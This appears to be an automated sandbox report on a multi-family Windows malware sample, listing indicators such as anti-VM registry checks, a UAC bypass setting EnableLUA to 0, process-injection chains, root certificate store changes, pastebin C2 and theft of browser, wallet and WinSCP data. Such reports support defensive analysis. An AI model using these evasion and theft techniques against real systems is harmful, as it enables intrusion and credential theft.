Malware Analysis Report

2025-06-15 19:54

Sample ID 240425-2d6ansga4s
Target f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287
SHA256 f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287
Tags
amadey evasion trojan glupteba lumma redline stealc zgrat @cloudytteam test1234 discovery dropper infostealer loader rat spyware stealer
score
10/10

Analysis Overview

score
10/10

SHA256

f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287

Threat Level: Known bad

The file f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287 was found to be: Known bad.

Malicious Activity Summary

amadey evasion trojan glupteba lumma redline stealc zgrat @cloudytteam test1234 discovery dropper infostealer loader rat spyware stealer

Detect ZGRat V1

Glupteba payload

Glupteba

RedLine payload

ZGRat

Amadey

Stealc

UAC bypass

RedLine

Lumma Stealer

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Modifies Windows Firewall

Downloads MZ/PE file

Stops running service(s)

Blocklisted process makes network request

Executes dropped EXE

Loads dropped DLL

Reads local data of messenger clients

Reads user/profile data of web browsers

Identifies Wine through registry keys

Checks BIOS information in registry

Reads WinSCP keys stored on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks whether UAC is enabled

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Looks up external IP address via web service

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Program crash

System policy modification

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies system certificate store

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Suspicious use of FindShellTrayWindow

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-25 22:28

Signatures

Unsigned PE


Analysis: behavioral1

Detonation Overview

Submitted

2024-04-25 22:28

Reported

2024-04-25 22:34

Platform

win7-20240221-en

Max time kernel

118s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe"

Signatures

Amadey

trojan amadey

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\chrosha.job C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe

"C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe"

Network

N/A

Files


Analysis: behavioral2

Detonation Overview

Submitted

2024-04-25 22:28

Reported

2024-04-25 22:34

Platform

win10-20240404-en

Max time kernel

93s

Max time network

297s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe"

Signatures

Amadey

trojan amadey

Detect ZGRat V1

Glupteba

loader dropper glupteba

Glupteba payload

Lumma Stealer

stealer lumma

RedLine

infostealer redline

RedLine payload

Stealc

stealer stealc

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe N/A

ZGRat

rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads local data of messenger clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\GameServerClient\installc.bat C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe N/A
File created C:\Program Files (x86)\GameServerClient\installg.bat C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe N/A
File created C:\Program Files (x86)\GameServerClient\GameService.exe C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe N/A
File opened for modification C:\Program Files (x86)\GameServerClient\GameServerClient.exe C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe N/A
File created C:\Program Files (x86)\GameServerClient\GameServerClientC.exe C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe N/A
File opened for modification C:\Program Files (x86)\GameServerClient\installc.bat C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe N/A
File opened for modification C:\Program Files (x86)\GameServerClient\installg.bat C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe N/A
File opened for modification C:\Program Files (x86)\GameServerClient\GameService.exe C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe N/A
File created C:\Program Files (x86)\GameServerClient\GameServerClient.exe C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe N/A
File opened for modification C:\Program Files (x86)\GameServerClient\GameServerClientC.exe C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\chrosha.job C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = … C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1680 wrote to memory of 200 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
PID 1680 wrote to memory of 200 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
PID 1680 wrote to memory of 200 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
PID 200 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 200 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 200 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 200 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 200 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 200 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 200 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 200 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 200 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1680 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
PID 1680 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
PID 1680 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
PID 2336 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2336 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2336 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2336 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2336 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2336 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2336 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2336 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 956 wrote to memory of 1396 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
PID 956 wrote to memory of 1396 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
PID 956 wrote to memory of 1396 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
PID 956 wrote to memory of 2892 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
PID 956 wrote to memory of 2892 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
PID 1680 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe
PID 1680 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe
PID 1680 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe
PID 1924 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1924 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1924 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1924 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1924 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1924 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1924 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1924 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1924 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1680 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
PID 1680 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
PID 1680 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
PID 4584 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe C:\Windows\SysWOW64\schtasks.exe
PID 4584 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe C:\Windows\SysWOW64\schtasks.exe
PID 4584 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe C:\Windows\SysWOW64\schtasks.exe
PID 4584 wrote to memory of 4872 N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe
PID 4584 wrote to memory of 4872 N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe
PID 1680 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Program Files (x86)\GameServerClient\GameService.exe
PID 1680 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Program Files (x86)\GameServerClient\GameService.exe
PID 1680 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Program Files (x86)\GameServerClient\GameService.exe
PID 2840 wrote to memory of 3444 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\System32\Conhost.exe
PID 2840 wrote to memory of 3444 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\System32\Conhost.exe
PID 1680 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe
PID 1680 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe
PID 1680 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe
PID 3444 wrote to memory of 4540 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\netsh.exe
PID 3444 wrote to memory of 4540 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\netsh.exe
PID 1680 wrote to memory of 292 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe
PID 1680 wrote to memory of 292 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe
PID 1680 wrote to memory of 292 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe
PID 4872 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4872 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4872 wrote to memory of 168 N/A C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe

